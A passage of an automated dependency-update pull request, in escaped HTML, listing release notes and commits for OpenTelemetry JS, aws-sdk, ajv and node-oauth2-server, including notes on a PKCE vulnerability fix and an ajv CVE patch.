\u003ccode\u003eLogger.emit()\u003c/code\u003e implementation \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6680\"\u003e#6680\u003c/a\u003e \u003ca href=\"https://github.com/david-luna\"\u003e\u003ccode\u003e@​david-luna\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eexperimental/v0.217.0\u003c/h2\u003e\n\u003ch2\u003e0.217.0\u003c/h2\u003e\n\u003ch3\u003e:rocket: Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat(otlp-transformer): replace protobufjs trace serialization with custom implementation \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6625\"\u003e#6625\u003c/a\u003e \u003ca href=\"https://github.com/pichlermarc\"\u003e\u003ccode\u003e@​pichlermarc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(configuration): auto-generate TypeScript types from OTel declarative config JSON schema (stable v1.0.0) using \u003ccode\u003ejson-schema-to-typescript\u003c/code\u003e and \u003ccode\u003eajv\u003c/code\u003e \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6533\"\u003e#6533\u003c/a\u003e \u003ca href=\"https://github.com/MikeGoldsmith\"\u003e\u003ccode\u003e@​MikeGoldsmith\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(configuration, sdk-node): \u003ccode\u003estartNodeSDK()\u003c/code\u003e code path now uses \u003ccode\u003elog_level\u003c/code\u003e configuration to setup a DiagConsoleLogger \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6668\"\u003e#6668\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eNote that allowed values for \u003ccode\u003elog_level\u003c/code\u003e in a configuration YAML file are \u003cem\u003enot\u003c/em\u003e the same set as for \u003ccode\u003eOTEL_LOG_LEVEL\u003c/code\u003e. Use \u003ccode\u003elog_level: trace\u003c/code\u003e to see \u003cem\u003eall\u003c/em\u003e logs (equivalent of \u003ccode\u003eOTEL_LOG_LEVEL=ALL\u003c/code\u003e). Use \u003ccode\u003elog_level: fatal\u003c/code\u003e to effectively disable the SDK's internal diagnostic logger (equivalent of \u003ccode\u003eOTEL_LOG_LEVEL=NONE\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eIf \u003ccode\u003elog_level\u003c/code\u003e is not specified, a diagnostic console logger at \u0026quot;info\u0026quot; level will be setup.\u003c/li\u003e\n\u003cli\u003eAn invalid YAML config file will now result in a noop OTel SDK.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e:bug: Bug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix(configuration): do not validate \u003ccode\u003eOTEL_CONFIG_FILE\u003c/code\u003e value before using it for file config \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6643\"\u003e#6643\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(configuration): improve how 'additionalProperties' in JSON schema is translated to TS types \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6650\"\u003e#6650\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(configuration): remove stripMinItems and preprocessNullArrays from validation/parsing \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6657\"\u003e#6657\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(configuration): improve handling of enums in generated types \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6659\"\u003e#6659\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(configuration): improve the technique for removing '| null' on types the JSON Schema \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6662\"\u003e#6662\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(sampler-jaeger-remote): add missing axios dep \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6656\"\u003e#6656\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(exporter-prometheus): handle malformed URLs in Prometheus exporter request handler \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6674\"\u003e#6674\u003c/a\u003e \u003ca href=\"https://github.com/homanp\"\u003e\u003ccode\u003e@​homanp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eexperimental/v0.216.0\u003c/h2\u003e\n\u003ch2\u003e0.216.0\u003c/h2\u003e\n\u003ch3\u003e:rocket: Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat(sdk-node): wire attribute_keys from declarative configuration to ViewOptions.attributesProcessors \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6427\"\u003e#6427\u003c/a\u003e \u003ca href=\"https://github.com/ravitheja4531-cell\"\u003e\u003ccode\u003e@​ravitheja4531-cell\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(sdk-node): set TracerProvider in startNodeSDK() \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6607\"\u003e#6607\u003c/a\u003e \u003ca href=\"https://github.com/maryliag\"\u003e\u003ccode\u003e@​maryliag\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e:bug: Bug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix(instrumentation-xml-http-request): avoid unwrapping \u003ccode\u003eXMLHttpRequest\u003c/code\u003e API when disabling \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6611\"\u003e#6611\u003c/a\u003e \u003ca href=\"https://github.com/david-luna\"\u003e\u003ccode\u003e@​david-luna\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(instrumentation-fetch): tolerate non-writable \u003ccode\u003eglobalThis.fetch\u003c/code\u003e and fix premature \u003ccode\u003e_isEnabled\u003c/code\u003e / \u003ccode\u003e_isFetchPatched\u003c/code\u003e flips in \u003ccode\u003eenable()\u003c/code\u003e \u003ca href=\"https://github.com/brunorodmoreira\"\u003e\u003ccode\u003e@​brunorodmoreira\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/06ad0eaaecbd49f5ead871325f852cc2a3454079\"\u003e\u003ccode\u003e06ad0ea\u003c/code\u003e\u003c/a\u003e chore: prepare next release (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6703\"\u003e#6703\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/38ca257e64ebd13f5603d5539f8a48d6d9232037\"\u003e\u003ccode\u003e38ca257\u003c/code\u003e\u003c/a\u003e feat(otlp-transformer): replace protobufjs metrics serialization with custom ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/013c60085b84351a4c1e4e4f79e3dd67c56661cd\"\u003e\u003ccode\u003e013c600\u003c/code\u003e\u003c/a\u003e chore: prepare next release (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6699\"\u003e#6699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/b7a0c63bde39d7916fdb73cbb3d64cf1c93282c5\"\u003e\u003ccode\u003eb7a0c63\u003c/code\u003e\u003c/a\u003e feat(semantic-conventions): update semantic conventions to v1.41.1 (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6695\"\u003e#6695\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/774143b2c6667c6537c000ab48ea5ce998278ca0\"\u003e\u003ccode\u003e774143b\u003c/code\u003e\u003c/a\u003e chore(renovate): add minimumReleaseAge to config (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6697\"\u003e#6697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/e0dafe0d9fadaccf7dd8d7b02dd85531356e2ac1\"\u003e\u003ccode\u003ee0dafe0\u003c/code\u003e\u003c/a\u003e fix(otlp-exporter-base): remove brackets from IPv6 hostname in HTTP transport...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/f804c93d1d6d903036b8bf38f8c3713dbbaf0360\"\u003e\u003ccode\u003ef804c93\u003c/code\u003e\u003c/a\u003e chore(deps): update github/codeql-action digest to 68bde55 (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6682\"\u003e#6682\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/95e48e7afcc475ded350b95b43070c54591ecbbb\"\u003e\u003ccode\u003e95e48e7\u003c/code\u003e\u003c/a\u003e refactor(sdk-logs): alias \u003ccode\u003eLoggerProviderConfig\u003c/code\u003e to \u003ccode\u003eLoggerProviderOptions\u003c/code\u003e (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/907b627d9ada25844b0f06551ecd9bbda5c0ea4f\"\u003e\u003ccode\u003e907b627\u003c/code\u003e\u003c/a\u003e feat(sdk-node): allow startNodeSDK() without an arg (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6688\"\u003e#6688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/0d1526198fafe7f90078ff353103d0427e6c64d4\"\u003e\u003ccode\u003e0d15261\u003c/code\u003e\u003c/a\u003e docs: Add SIG meeting info and welcoming language (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6689\"\u003e#6689\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/compare/experimental/v0.41.2...experimental/v0.218.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​opentelemetry/sdk-node\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `aws-sdk` from 2.1358.0 to 2.1693.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-js/releases\"\u003eaws-sdk's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eRelease v2.1693.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1692.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1691.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1690.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1689.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1688.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1687.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1686.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1685.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1684.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1683.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1682.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1681.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1680.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1679.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1678.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1677.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/9d3c66eca8c4416a9d347d0703f27b65775d65ef\"\u003e\u003ccode\u003e9d3c66e\u003c/code\u003e\u003c/a\u003e Updates SDK to v2.1693.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/c039567cee58b50a44f53f30318fa21f36c42ecc\"\u003e\u003ccode\u003ec039567\u003c/code\u003e\u003c/a\u003e test(client-elastictranscoder): remove feature test (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4711\"\u003e#4711\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/f5b1a6f0aebb477204d979091d654649f29ad9ce\"\u003e\u003ccode\u003ef5b1a6f\u003c/code\u003e\u003c/a\u003e docs: end-of-support (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4706\"\u003e#4706\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/657d6feb00447c8be1d65158a0ecc0585b70ed60\"\u003e\u003ccode\u003e657d6fe\u003c/code\u003e\u003c/a\u003e chore: use ssh private key for git sync (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4705\"\u003e#4705\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/c12585baeb9197158cd50975af66856617732aea\"\u003e\u003ccode\u003ec12585b\u003c/code\u003e\u003c/a\u003e chore: remove regression label management (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4699\"\u003e#4699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/966fa6c316dbb11ca9277564ff7120e6b16467f4\"\u003e\u003ccode\u003e966fa6c\u003c/code\u003e\u003c/a\u003e Updates SDK to v2.1692.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/5d0e38adbbc1a3fd6e6bf7c48cd7e209e9eb0b5f\"\u003e\u003ccode\u003e5d0e38a\u003c/code\u003e\u003c/a\u003e Delete EC2 launch configuration e2e tests (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4685\"\u003e#4685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/b9ce3461a495dcf4f4a0be133e103d98130847a6\"\u003e\u003ccode\u003eb9ce346\u003c/code\u003e\u003c/a\u003e chore: fix issue config (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4683\"\u003e#4683\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/c06668172b233e0b2ded1afc48f0a11f6b79735c\"\u003e\u003ccode\u003ec066681\u003c/code\u003e\u003c/a\u003e Update issue template config and disable docs requests (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4682\"\u003e#4682\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/163a7cfc86308e0b54245c04fb7b317bcd3893b0\"\u003e\u003ccode\u003e163a7cf\u003c/code\u003e\u003c/a\u003e Modified bug issue template to add checkbox to report potential regression. (...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-js/compare/v2.1358.0...v2.1693.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ajv` from 6.12.6 to 6.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/e3af0a723b4b7ad86eff43be355c706d31e0e915\"\u003e\u003ccode\u003ee3af0a7\u003c/code\u003e\u003c/a\u003e 6.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/b552ed66191eb338498df3196065c777e3bb71f2\"\u003e\u003ccode\u003eb552ed6\u003c/code\u003e\u003c/a\u003e add regExp option to address $data exploit via a regular expression (CVE-2025...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/72f228665859eed5e2be3a66f8c4a7aff6b34dcf\"\u003e\u003ccode\u003e72f2286\u003c/code\u003e\u003c/a\u003e docs: update v7 info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/231e52b3bca62559202b95e5fb5cee02145b226a\"\u003e\u003ccode\u003e231e52b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/ajv-validator/ajv/issues/1320\"\u003e#1320\u003c/a\u003e from philsturgeon/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/d3475fc20416c33fe030c8aa3b09fa411f325bbd\"\u003e\u003ccode\u003ed3475fc\u003c/code\u003e\u003c/a\u003e Add spectral, an AJV util from a sponsor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/413afe01f518ea74d1740a7cb211df787c585544\"\u003e\u003ccode\u003e413afe0\u003c/code\u003e\u003c/a\u003e docs: v7.0.0-beta.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/11e997bda2f3eecb445c1e5a07d96ef7e81c5f5d\"\u003e\u003ccode\u003e11e997b\u003c/code\u003e\u003c/a\u003e update readme for v7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/ajv-validator/ajv/compare/v6.12.6...v6.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@node-oauth/oauth2-server` from 5.1.0 to 5.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/node-oauth/node-oauth2-server/releases\"\u003e@​node-oauth/oauth2-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.3.0\u003c/h2\u003e\n\u003ch2\u003eAttention! This release fixes a reported vulnerability in the PKCE workflow!\u003c/h2\u003e\n\u003cp\u003eRead more here: \u003ca href=\"https://github.com/node-oauth/node-oauth2-server/security/advisories/GHSA-jhm7-29pj-4xvf\"\u003ehttps://github.com/node-oauth/node-oauth2-server/security/advisories/GHSA-jhm7-29pj-4xvf\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThis affects all versions below 5.3.0.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003ePKCE fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eproper enforcement of parameter ABNF\u003c/li\u003e\n\u003cli\u003efailed PKCE challenge revokes authorization code to prevent brute force\u003c/li\u003e\n\u003cli\u003echallenge comparison using timing safe comparison\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplain\u003c/code\u003e challenges need explicit option \u003ccode\u003eenablePlainPKCE\u003c/code\u003e to be \u003ccode\u003etrue\u003c/code\u003e when creating a new server instance\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eExpose options property on OAuth2Server class types by \u003ca href=\"https://github.com/wille\"\u003e\u003ccode\u003e@​wille\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/378\"\u003enode-oauth/node-oauth2-server#378\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: bump node versions to minimum 20 by \u003ca href=\"https://github.com/jankapunkt\"\u003e\u003ccode\u003e@​jankapunkt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/383\"\u003enode-oauth/node-oauth2-server#383\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: pass proper arguments to createHash by \u003ca href=\"https://github.com/jankapunkt\"\u003e\u003ccode\u003e@​jankapunkt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/387\"\u003enode-oauth/node-oauth2-server#387\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocs: vitepress by \u003ca href=\"https://github.com/jankapunkt\"\u003e\u003ccode\u003e@​jankapunkt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/388\"\u003enode-oauth/node-oauth2-server#388\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/364\"\u003enode-oauth/node-oauth2-server#364\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump mocha from 11.7.1 to 11.7.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/366\"\u003enode-oauth/node-oauth2-server#366\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/369\"\u003enode-oauth/node-oauth2-server#369\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump mocha from 11.7.2 to 11.7.3 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/371\"\u003enode-oauth/node-oauth2-server#371\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump mocha from 11.7.3 to 11.7.4 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/372\"\u003enode-oauth/node-oauth2-server#372\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump github/codeql-action from 3 to 4 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/373\"\u003enode-oauth/node-oauth2-server#373\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/374\"\u003enode-oauth/node-oauth2-server#374\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump mocha from 11.7.4 to 11.7.5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/375\"\u003enode-oauth/node-oauth2-server#375\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump js-yaml from 3.14.1 to 3.14.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/380\"\u003enode-oauth/node-oauth2-server#380\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump glob from 10.4.5 to 10.5.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/381\"\u003enode-oauth/node-oauth2-server#381\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/382\"\u003enode-oauth/node-oauth2-server#382\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump sinon from 21.0.0 to 21.0.1 by \u003ca 